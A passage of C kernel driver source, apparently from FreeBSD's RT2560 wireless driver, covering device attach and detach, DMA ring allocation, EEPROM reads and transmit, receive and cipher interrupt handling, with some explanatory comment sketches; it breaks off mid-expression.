callout_init_mtx(&sc->watchdog_ch, &sc->sc_mtx, 0); /* retrieve RT2560 rev. no */ sc->asic_rev = RAL_READ(sc, RT2560_CSR0); /* retrieve RF rev. no and various other things from EEPROM */ rt2560_read_config(sc); device_printf(dev, "MAC/BBP RT2560 (rev 0x%02x), RF %s\n", sc->asic_rev, rt2560_get_rf(sc->rf_rev)); /* * Allocate Tx and Rx rings. 
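	 *
	 * The rt2560_alloc_*_ring() helpers called below all follow the
	 * usual busdma sequence; a condensed sketch (error handling
	 * omitted, dev/size/descs/tag/map/physaddr are placeholder names):
	 *
	 *	bus_dma_tag_create(bus_get_dma_tag(dev), 4, 0,
	 *	    BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL,
	 *	    size, 1, size, 0, NULL, NULL, &tag);
	 *	bus_dmamem_alloc(tag, (void **)&descs,
	 *	    BUS_DMA_NOWAIT | BUS_DMA_ZERO, &map);
	 *	bus_dmamap_load(tag, map, descs, size, rt2560_dma_map_addr,
	 *	    &physaddr, 0);
	 *
	 * i.e. create a DMA tag describing the constraints, allocate the
	 * descriptor memory, then load it to obtain the bus address that
	 * is later programmed into the TXCSR3/RXCSR2 ring base registers.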
*/ error = rt2560_alloc_tx_ring(sc, &sc->txq, RT2560_TX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Tx ring\n"); goto fail1; } error = rt2560_alloc_tx_ring(sc, &sc->atimq, RT2560_ATIM_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate ATIM ring\n"); goto fail2; } error = rt2560_alloc_tx_ring(sc, &sc->prioq, RT2560_PRIO_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Prio ring\n"); goto fail3; } error = rt2560_alloc_tx_ring(sc, &sc->bcnq, RT2560_BEACON_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Beacon ring\n"); goto fail4; } error = rt2560_alloc_rx_ring(sc, &sc->rxq, RT2560_RX_RING_COUNT); if (error != 0) { device_printf(sc->sc_dev, "could not allocate Rx ring\n"); goto fail5; } ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto fail6; } ic = ifp->if_l2com; /* retrieve MAC address */ rt2560_get_macaddr(sc, macaddr); ifp->if_softc = sc; if_initname(ifp, device_get_name(dev), device_get_unit(dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = rt2560_init; ifp->if_ioctl = rt2560_ioctl; ifp->if_start = rt2560_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_opmode = IEEE80211_M_STA; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_IBSS /* ibss, nee adhoc, mode */ | IEEE80211_C_HOSTAP /* hostap mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_AHDEMO /* adhoc demo mode */ | IEEE80211_C_WDS /* 4-address traffic works */ | IEEE80211_C_MBSS /* mesh point link mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_WPA /* capable of WPA1+WPA2 */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ #ifdef notyet | IEEE80211_C_TXFRAG /* handle tx frags */ #endif ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); if (sc->rf_rev == RT2560_RF_5222) setbit(&bands, IEEE80211_MODE_11A); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, macaddr); ic->ic_raw_xmit = rt2560_raw_xmit; ic->ic_updateslot = rt2560_update_slot; ic->ic_update_promisc = rt2560_update_promisc; ic->ic_scan_start = rt2560_scan_start; ic->ic_scan_end = rt2560_scan_end; ic->ic_set_channel = rt2560_set_channel; ic->ic_vap_create = rt2560_vap_create; ic->ic_vap_delete = rt2560_vap_delete; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), RT2560_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), RT2560_RX_RADIOTAP_PRESENT); /* * Add a few sysctl knobs. 
*/ #ifdef RAL_DEBUG SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "debug", CTLFLAG_RW, &sc->sc_debug, 0, "debug msgs"); #endif SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "txantenna", CTLFLAG_RW, &sc->tx_ant, 0, "tx antenna (0=auto)"); SYSCTL_ADD_INT(device_get_sysctl_ctx(dev), SYSCTL_CHILDREN(device_get_sysctl_tree(dev)), OID_AUTO, "rxantenna", CTLFLAG_RW, &sc->rx_ant, 0, "rx antenna (0=auto)"); if (bootverbose) ieee80211_announce(ic); return 0; fail6: rt2560_free_rx_ring(sc, &sc->rxq); fail5: rt2560_free_tx_ring(sc, &sc->bcnq); fail4: rt2560_free_tx_ring(sc, &sc->prioq); fail3: rt2560_free_tx_ring(sc, &sc->atimq); fail2: rt2560_free_tx_ring(sc, &sc->txq); fail1: mtx_destroy(&sc->sc_mtx); return ENXIO; } int rt2560_detach(void *xsc) { struct rt2560_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; rt2560_stop(sc); ieee80211_ifdetach(ic); rt2560_free_tx_ring(sc, &sc->txq); rt2560_free_tx_ring(sc, &sc->atimq); rt2560_free_tx_ring(sc, &sc->prioq); rt2560_free_tx_ring(sc, &sc->bcnq); rt2560_free_rx_ring(sc, &sc->rxq); if_free(ifp); mtx_destroy(&sc->sc_mtx); return 0; } static struct ieee80211vap * rt2560_vap_create(struct ieee80211com *ic, const char name[IFNAMSIZ], int unit, enum ieee80211_opmode opmode, int flags, const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t mac[IEEE80211_ADDR_LEN]) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_vap *rvp; struct ieee80211vap *vap; switch (opmode) { case IEEE80211_M_STA: case IEEE80211_M_IBSS: case IEEE80211_M_AHDEMO: case IEEE80211_M_MONITOR: case IEEE80211_M_HOSTAP: case IEEE80211_M_MBSS: /* XXXRP: TBD */ if (!TAILQ_EMPTY(&ic->ic_vaps)) { if_printf(ifp, "only 1 vap supported\n"); return NULL; } if (opmode == IEEE80211_M_STA) flags |= IEEE80211_CLONE_NOBEACONS; break; case IEEE80211_M_WDS: if (TAILQ_EMPTY(&ic->ic_vaps) || ic->ic_opmode != IEEE80211_M_HOSTAP) { if_printf(ifp, "wds only supported in ap mode\n"); return NULL; } /* * Silently remove any request for a unique * bssid; WDS vap's always share the local * mac address. 
*/ flags &= ~IEEE80211_CLONE_BSSID; break; default: if_printf(ifp, "unknown opmode %d\n", opmode); return NULL; } rvp = (struct rt2560_vap *) malloc(sizeof(struct rt2560_vap), M_80211_VAP, M_NOWAIT | M_ZERO); if (rvp == NULL) return NULL; vap = &rvp->ral_vap; ieee80211_vap_setup(ic, vap, name, unit, opmode, flags, bssid, mac); /* override state transition machine */ rvp->ral_newstate = vap->iv_newstate; vap->iv_newstate = rt2560_newstate; vap->iv_update_beacon = rt2560_beacon_update; ieee80211_ratectl_init(vap); /* complete setup */ ieee80211_vap_attach(vap, ieee80211_media_change, ieee80211_media_status); if (TAILQ_FIRST(&ic->ic_vaps) == vap) ic->ic_opmode = opmode; return vap; } static void rt2560_vap_delete(struct ieee80211vap *vap) { struct rt2560_vap *rvp = RT2560_VAP(vap); ieee80211_ratectl_deinit(vap); ieee80211_vap_detach(vap); free(rvp, M_80211_VAP); } void rt2560_resume(void *xsc) { struct rt2560_softc *sc = xsc; struct ifnet *ifp = sc->sc_ifp; if (ifp->if_flags & IFF_UP) rt2560_init(sc); } static void rt2560_dma_map_addr(void *arg, bus_dma_segment_t *segs, int nseg, int error) { if (error != 0) return; KASSERT(nseg == 1, ("too many DMA segments, %d should be 1", nseg)); *(bus_addr_t *)arg = segs[0].ds_addr; } static int rt2560_alloc_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring, int count) { int i, error; ring->count = count; ring->queued = 0; ring->cur = ring->next = 0; ring->cur_encrypt = ring->next_encrypt = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2560_TX_DESC_SIZE, 1, count * RT2560_TX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2560_TX_DESC_SIZE, rt2560_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2560_tx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, RT2560_MAX_SCATTER, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { error = bus_dmamap_create(ring->data_dmat, 0, &ring->data[i].map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } } return 0; fail: rt2560_free_tx_ring(sc, ring); return error; } static void rt2560_reset_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring) { struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; int i; for (i = 0; i < ring->count; i++) { desc = &ring->desc[i]; data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; } desc->flags = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->queued = 0; ring->cur = 
ring->next = 0; ring->cur_encrypt = ring->next_encrypt = 0; } static void rt2560_free_tx_ring(struct rt2560_softc *sc, struct rt2560_tx_ring *ring) { struct rt2560_tx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->ni != NULL) ieee80211_free_node(data->ni); if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2560_alloc_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring, int count) { struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_addr_t physaddr; int i, error; ring->count = count; ring->cur = ring->next = 0; ring->cur_decrypt = 0; error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 4, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, count * RT2560_RX_DESC_SIZE, 1, count * RT2560_RX_DESC_SIZE, 0, NULL, NULL, &ring->desc_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create desc DMA tag\n"); goto fail; } error = bus_dmamem_alloc(ring->desc_dmat, (void **)&ring->desc, BUS_DMA_NOWAIT | BUS_DMA_ZERO, &ring->desc_map); if (error != 0) { device_printf(sc->sc_dev, "could not allocate DMA memory\n"); goto fail; } error = bus_dmamap_load(ring->desc_dmat, ring->desc_map, ring->desc, count * RT2560_RX_DESC_SIZE, rt2560_dma_map_addr, &ring->physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load desc DMA map\n"); goto fail; } ring->data = malloc(count * sizeof (struct rt2560_rx_data), M_DEVBUF, M_NOWAIT | M_ZERO); if (ring->data == NULL) { device_printf(sc->sc_dev, "could not allocate soft data\n"); error = ENOMEM; goto fail; } /* * Pre-allocate Rx buffers and populate Rx ring. 
*/ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), 1, 0, BUS_SPACE_MAXADDR_32BIT, BUS_SPACE_MAXADDR, NULL, NULL, MCLBYTES, 1, MCLBYTES, 0, NULL, NULL, &ring->data_dmat); if (error != 0) { device_printf(sc->sc_dev, "could not create data DMA tag\n"); goto fail; } for (i = 0; i < count; i++) { desc = &sc->rxq.desc[i]; data = &sc->rxq.data[i]; error = bus_dmamap_create(ring->data_dmat, 0, &data->map); if (error != 0) { device_printf(sc->sc_dev, "could not create DMA map\n"); goto fail; } data->m = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (data->m == NULL) { device_printf(sc->sc_dev, "could not allocate rx mbuf\n"); error = ENOMEM; goto fail; } error = bus_dmamap_load(ring->data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { device_printf(sc->sc_dev, "could not load rx buf DMA map"); goto fail; } desc->flags = htole32(RT2560_RX_BUSY); desc->physaddr = htole32(physaddr); } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); return 0; fail: rt2560_free_rx_ring(sc, ring); return error; } static void rt2560_reset_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring) { int i; for (i = 0; i < ring->count; i++) { ring->desc[i].flags = htole32(RT2560_RX_BUSY); ring->data[i].drop = 0; } bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_PREWRITE); ring->cur = ring->next = 0; ring->cur_decrypt = 0; } static void rt2560_free_rx_ring(struct rt2560_softc *sc, struct rt2560_rx_ring *ring) { struct rt2560_rx_data *data; int i; if (ring->desc != NULL) { bus_dmamap_sync(ring->desc_dmat, ring->desc_map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->desc_dmat, ring->desc_map); bus_dmamem_free(ring->desc_dmat, ring->desc, ring->desc_map); } if (ring->desc_dmat != NULL) bus_dma_tag_destroy(ring->desc_dmat); if (ring->data != NULL) { for (i = 0; i < ring->count; i++) { data = &ring->data[i]; if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); } if (data->map != NULL) bus_dmamap_destroy(ring->data_dmat, data->map); } free(ring->data, M_DEVBUF); } if (ring->data_dmat != NULL) bus_dma_tag_destroy(ring->data_dmat); } static int rt2560_newstate(struct ieee80211vap *vap, enum ieee80211_state nstate, int arg) { struct rt2560_vap *rvp = RT2560_VAP(vap); struct ifnet *ifp = vap->iv_ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; int error; if (nstate == IEEE80211_S_INIT && vap->iv_state == IEEE80211_S_RUN) { /* abort TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 0); /* turn association led off */ rt2560_update_led(sc, 0, 0); } error = rvp->ral_newstate(vap, nstate, arg); if (error == 0 && nstate == IEEE80211_S_RUN) { struct ieee80211_node *ni = vap->iv_bss; struct mbuf *m; if (vap->iv_opmode != IEEE80211_M_MONITOR) { rt2560_update_plcp(sc); rt2560_set_basicrates(sc, &ni->ni_rates); rt2560_set_bssid(sc, ni->ni_bssid); } if (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { m = ieee80211_beacon_alloc(ni, &rvp->ral_bo); if (m == NULL) { if_printf(ifp, "could not allocate beacon\n"); return ENOBUFS; } ieee80211_ref_node(ni); error = rt2560_tx_bcn(sc, m, ni); if (error != 0) return error; } /* turn assocation led on */ rt2560_update_led(sc, 1, 0); if (vap->iv_opmode != IEEE80211_M_MONITOR) rt2560_enable_tsf_sync(sc); else rt2560_enable_tsf(sc); } return error; } /* * Read 16 bits at address 'addr' from the serial EEPROM (either 93C46 or * 93C66). 
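 *
 * The routine below bit-bangs the 93Cx6 three-wire protocol: a start bit,
 * the READ opcode (binary 10), the address (6 bits for the 93C46, 8 bits
 * for the 93C66, hence the RT2560_93C46 test), then 16 data bits clocked
 * in MSB first.  As a plain-C illustration of the MSB-first shifting used
 * for both the address and the data (sketch only):
 *
 *	uint16_t val = 0;
 *	for (int n = 15; n >= 0; n--)
 *		val |= (uint16_t)read_data_bit() << n;
 *
 * where read_data_bit() is a placeholder for sampling the Q line after a
 * clock pulse, as done with RAL_READ(sc, RT2560_CSR21) below.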
*/ static uint16_t rt2560_eeprom_read(struct rt2560_softc *sc, uint8_t addr) { uint32_t tmp; uint16_t val; int n; /* clock C once before the first command */ RT2560_EEPROM_CTL(sc, 0); RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); RT2560_EEPROM_CTL(sc, RT2560_S); /* write start bit (1) */ RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D | RT2560_C); /* write READ opcode (10) */ RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_D | RT2560_C); RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); /* write address (A5-A0 or A7-A0) */ n = (RAL_READ(sc, RT2560_CSR21) & RT2560_93C46) ? 5 : 7; for (; n >= 0; n--) { RT2560_EEPROM_CTL(sc, RT2560_S | (((addr >> n) & 1) << RT2560_SHIFT_D)); RT2560_EEPROM_CTL(sc, RT2560_S | (((addr >> n) & 1) << RT2560_SHIFT_D) | RT2560_C); } RT2560_EEPROM_CTL(sc, RT2560_S); /* read data Q15-Q0 */ val = 0; for (n = 15; n >= 0; n--) { RT2560_EEPROM_CTL(sc, RT2560_S | RT2560_C); tmp = RAL_READ(sc, RT2560_CSR21); val |= ((tmp & RT2560_Q) >> RT2560_SHIFT_Q) << n; RT2560_EEPROM_CTL(sc, RT2560_S); } RT2560_EEPROM_CTL(sc, 0); /* clear Chip Select and clock C */ RT2560_EEPROM_CTL(sc, RT2560_S); RT2560_EEPROM_CTL(sc, 0); RT2560_EEPROM_CTL(sc, RT2560_C); return val; } /* * Some frames were processed by the hardware cipher engine and are ready for * transmission. */ static void rt2560_encryption_intr(struct rt2560_softc *sc) { struct rt2560_tx_desc *desc; int hw; /* retrieve last descriptor index processed by cipher engine */ hw = RAL_READ(sc, RT2560_SECCSR1) - sc->txq.physaddr; hw /= RT2560_TX_DESC_SIZE; bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_POSTREAD); while (sc->txq.next_encrypt != hw) { if (sc->txq.next_encrypt == sc->txq.cur_encrypt) { printf("hw encrypt %d, cur_encrypt %d\n", hw, sc->txq.cur_encrypt); break; } desc = &sc->txq.desc[sc->txq.next_encrypt]; if ((le32toh(desc->flags) & RT2560_TX_BUSY) || (le32toh(desc->flags) & RT2560_TX_CIPHER_BUSY)) break; /* for TKIP, swap eiv field to fix a bug in ASIC */ if ((le32toh(desc->flags) & RT2560_TX_CIPHER_MASK) == RT2560_TX_CIPHER_TKIP) desc->eiv = bswap32(desc->eiv); /* mark the frame ready for transmission */ desc->flags |= htole32(RT2560_TX_VALID); desc->flags |= htole32(RT2560_TX_BUSY); DPRINTFN(sc, 15, "encryption done idx=%u\n", sc->txq.next_encrypt); sc->txq.next_encrypt = (sc->txq.next_encrypt + 1) % RT2560_TX_RING_COUNT; } bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); /* kick Tx */ RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_TX); } static void rt2560_tx_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct mbuf *m; uint32_t flags; int retrycnt; struct ieee80211vap *vap; struct ieee80211_node *ni; bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->txq.desc[sc->txq.next]; data = &sc->txq.data[sc->txq.next]; flags = le32toh(desc->flags); if ((flags & RT2560_TX_BUSY) || (flags & RT2560_TX_CIPHER_BUSY) || !(flags & RT2560_TX_VALID)) break; m = data->m; ni = data->ni; vap = ni->ni_vap; switch (flags & RT2560_TX_RESULT_MASK) { case RT2560_TX_SUCCESS: retrycnt = 0; DPRINTFN(sc, 10, "%s\n", "data frame sent successfully"); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2560_TX_SUCCESS_RETRY: retrycnt = 
RT2560_TX_RETRYCNT(flags); DPRINTFN(sc, 9, "data frame sent after %u retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &retrycnt, NULL); ifp->if_opackets++; break; case RT2560_TX_FAIL_RETRY: retrycnt = RT2560_TX_RETRYCNT(flags); DPRINTFN(sc, 9, "data frame failed after %d retries\n", retrycnt); if (data->rix != IEEE80211_FIXED_RATE_NONE) ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &retrycnt, NULL); ifp->if_oerrors++; break; case RT2560_TX_FAIL_INVALID: case RT2560_TX_FAIL_OTHER: default: device_printf(sc->sc_dev, "sending data frame failed " "0x%08x\n", flags); ifp->if_oerrors++; } bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->txq.data_dmat, data->map); m_freem(m); data->m = NULL; ieee80211_free_node(data->ni); data->ni = NULL; /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2560_TX_VALID); DPRINTFN(sc, 15, "tx done idx=%u\n", sc->txq.next); sc->txq.queued--; sc->txq.next = (sc->txq.next + 1) % RT2560_TX_RING_COUNT; } bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); if (sc->prioq.queued == 0 && sc->txq.queued == 0) sc->sc_tx_timer = 0; if (sc->txq.queued < RT2560_TX_RING_COUNT - 1) { sc->sc_flags &= ~RT2560_F_DATA_OACTIVE; if ((sc->sc_flags & (RT2560_F_DATA_OACTIVE | RT2560_F_PRIO_OACTIVE)) == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2560_start_locked(ifp); } } static void rt2560_prio_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_node *ni; struct mbuf *m; int flags; bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_POSTREAD); for (;;) { desc = &sc->prioq.desc[sc->prioq.next]; data = &sc->prioq.data[sc->prioq.next]; flags = le32toh(desc->flags); if ((flags & RT2560_TX_BUSY) || (flags & RT2560_TX_VALID) == 0) break; switch (flags & RT2560_TX_RESULT_MASK) { case RT2560_TX_SUCCESS: DPRINTFN(sc, 10, "%s\n", "mgt frame sent successfully"); break; case RT2560_TX_SUCCESS_RETRY: DPRINTFN(sc, 9, "mgt frame sent after %u retries\n", (flags >> 5) & 0x7); break; case RT2560_TX_FAIL_RETRY: DPRINTFN(sc, 9, "%s\n", "sending mgt frame failed (too much retries)"); break; case RT2560_TX_FAIL_INVALID: case RT2560_TX_FAIL_OTHER: default: device_printf(sc->sc_dev, "sending mgt frame failed " "0x%08x\n", flags); break; } bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(sc->prioq.data_dmat, data->map); m = data->m; data->m = NULL; ni = data->ni; data->ni = NULL; /* descriptor is no longer valid */ desc->flags &= ~htole32(RT2560_TX_VALID); DPRINTFN(sc, 15, "prio done idx=%u\n", sc->prioq.next); sc->prioq.queued--; sc->prioq.next = (sc->prioq.next + 1) % RT2560_PRIO_RING_COUNT; if (m->m_flags & M_TXCB) ieee80211_process_callback(ni, m, (flags & RT2560_TX_RESULT_MASK) &~ (RT2560_TX_SUCCESS | RT2560_TX_SUCCESS_RETRY)); m_freem(m); ieee80211_free_node(ni); } bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); if (sc->prioq.queued == 0 && sc->txq.queued == 0) sc->sc_tx_timer = 0; if (sc->prioq.queued < RT2560_PRIO_RING_COUNT) { sc->sc_flags &= ~RT2560_F_PRIO_OACTIVE; if ((sc->sc_flags & (RT2560_F_DATA_OACTIVE | RT2560_F_PRIO_OACTIVE)) == 0) ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; rt2560_start_locked(ifp); } } /* * Some frames were processed by the hardware cipher engine and are ready for * handoff to the IEEE802.11 layer. 
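 *
 * The handler below recovers the cipher engine's position in the ring from
 * the descriptor bus address in SECCSR0; the encryption side uses the same
 * idiom with SECCSR1.  A minimal sketch of that address-to-index
 * conversion (illustrative only):
 *
 *	static u_int
 *	ring_index(uint32_t csr_addr, uint32_t ring_physaddr, u_int desc_size)
 *	{
 *		return (csr_addr - ring_physaddr) / desc_size;
 *	}
 *
 * For example, with a 32-byte descriptor a register value of ring base + 96
 * means the engine has advanced to slot 3; the loop then walks cur_decrypt
 * forward modulo RT2560_RX_RING_COUNT until it catches up with that index.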
*/ static void rt2560_decryption_intr(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct rt2560_rx_desc *desc; struct rt2560_rx_data *data; bus_addr_t physaddr; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *mnew, *m; int hw, error; int8_t rssi, nf; /* retrieve last decriptor index processed by cipher engine */ hw = RAL_READ(sc, RT2560_SECCSR0) - sc->rxq.physaddr; hw /= RT2560_RX_DESC_SIZE; bus_dmamap_sync(sc->rxq.desc_dmat, sc->rxq.desc_map, BUS_DMASYNC_POSTREAD); for (; sc->rxq.cur_decrypt != hw;) { desc = &sc->rxq.desc[sc->rxq.cur_decrypt]; data = &sc->rxq.data[sc->rxq.cur_decrypt]; if ((le32toh(desc->flags) & RT2560_RX_BUSY) || (le32toh(desc->flags) & RT2560_RX_CIPHER_BUSY)) break; if (data->drop) { ifp->if_ierrors++; goto skip; } if ((le32toh(desc->flags) & RT2560_RX_CIPHER_MASK) != 0 && (le32toh(desc->flags) & RT2560_RX_ICV_ERROR)) { ifp->if_ierrors++; goto skip; } /* * Try to allocate a new mbuf for this ring element and load it * before processing the current mbuf. If the ring element * cannot be loaded, drop the received packet and reuse the old * mbuf. In the unlikely case that the old mbuf can't be * reloaded either, explicitly panic. */ mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; goto skip; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); bus_dmamap_unload(sc->rxq.data_dmat, data->map); error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(mnew, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { m_freem(mnew); /* try to reload the old mbuf */ error = bus_dmamap_load(sc->rxq.data_dmat, data->map, mtod(data->m, void *), MCLBYTES, rt2560_dma_map_addr, &physaddr, 0); if (error != 0) { /* very unlikely that it will fail... */ panic("%s: could not load old rx mbuf", device_get_name(sc->sc_dev)); } ifp->if_ierrors++; goto skip; } /* * New mbuf successfully loaded, update Rx ring and continue * processing. */ m = data->m; data->m = mnew; desc->physaddr = htole32(physaddr); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = (le32toh(desc->flags) >> 16) & 0xfff; rssi = RT2560_RSSI(sc, desc->rssi); nf = RT2560_NOISE_FLOOR; if (ieee80211_radiotap_active(ic)) { struct rt2560_rx_radiotap_header *tap = &sc->sc_rxtap; uint32_t tsf_lo, tsf_hi; /* get timestamp (low and high 32 bits) */ tsf_hi = RAL_READ(sc, RT2560_CSR17); tsf_lo = RAL_READ(sc, RT2560_CSR16); tap->wr_tsf = htole64(((uint64_t)tsf_hi << 32) | tsf_lo); tap->wr_flags = 0; tap->wr_rate = ieee80211_plcp2rate(desc->rate, (desc->flags & htole32(RT2560_RX_OFDM)) ? IEEE80211_T_OFDM : 